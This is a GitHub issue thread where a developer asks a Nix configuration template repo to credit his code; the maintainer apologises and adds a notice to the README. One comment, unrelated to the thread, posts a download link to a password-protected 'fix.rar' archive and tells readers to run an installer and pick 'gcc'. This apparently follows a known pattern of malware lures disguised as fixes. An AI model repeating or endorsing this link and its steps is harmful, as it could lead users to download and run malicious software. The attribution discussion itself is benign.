### ISSUE TITLE
license notice please :)

### ISSUE THREAD

**Issue by NotAShelf** [Spacebar-Cowboys/nyx-template#3]
Hi, I normally don't do this but I've grown very tired of copy-pastes.

Since you are using my code, as is, and with my comments - I think you could at least show me the kindness of including a copyright notice. The code was given for free, without asking for anything in return but a license notice would be very much appreciated.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cydiralis** [comment]
Absolutely shameful of them to not bother giving credit to ya


...especially when they evidentally haven't heard of maintaining """""""their""""""" work. 2 months since the last commit lmao

**Comment by UseTheFork** [comment]
> Hi, I normally don't do this but I've grown very tired of copy-pastes.
> 
> Since you are using my code, as is, and with my comments - I think you could at least show me the kindness of including a copyright notice. The code was given for free, without asking for anything in return but a license notice would be very much appreciated.

I agree! This repo is 100% based on your work and I used it to learn nix with a few of my friends. Since then I have stopped using this repo and have my private repo I maintain. I'm sorry for not giving you credit where credit is due this project was more of a learning experiment than anything and forking your repo didn't make a whole lot of sense.

I can delete The repo or I can change the readme to point at your archived one. You tell me!

Again sorry for not giving you immediate credit my purpose was not to harm or any of the above it just wasn't what I was thinking about when I was working on this. :)

**Comment by UseTheFork** [comment]
> Absolutely shameful of them to not bother giving credit to ya
> 
> ...especially when they evidentally haven't heard of maintaining """""""their""""""" work. 2 months since the last commit lmao

Calm down, my dude. It was an oversight while I was learning Nix. Nothing intentional and I have since made my own private dot repo (Hence not painting this one. We tried to have one repo for all of our machines that was a bad idea.). NotASHelf is actually a huge inspiration and he is the reason I was able to learn Nix. He 100% deserves credit and what I do with this repo is really up to him. I can change the readme, delete it, or archive it. It's his call.

**Comment by NotAShelf** [comment]
I do not wish to impose anything, e.g., for you to delete. Just a small copyright notice (for example, "this repo is based on `<link to my repo>`") is fine.

**Comment by MrAureliusR** [comment]
> > Hi, I normally don't do this but I've grown very tired of copy-pastes.
> > Since you are using my code, as is, and with my comments - I think you could at least show me the kindness of including a copyright notice. The code was given for free, without asking for anything in return but a license notice would be very much appreciated.
> 
> I agree! This repo is 100% based on your work and I used it to learn nix with a few of my friends. Since then I have stopped using this repo and have my private repo I maintain. I'm sorry for not giving you credit where credit is due this project was more of a learning experiment than anything and forking your repo didn't make a whole lot of sense.
> 
> I can delete The repo or I can change the readme to point at your archived one. You tell me!
> 
> Again sorry for not giving you immediate credit my purpose was not to harm or any of the above it just wasn't what I was thinking about when I was working on this. :)

Now THIS is the way to handle license obligation requests! Good work.

**Comment by UseTheFork** [comment]
> I do not wish to impose anything, e.g., for you to delete. Just a small copyright notice (for example, "this repo is based on `<link to my repo>`") is fine.

All set! I updated the readme Let me know if you want anything changed. Again thanks for the hard work!
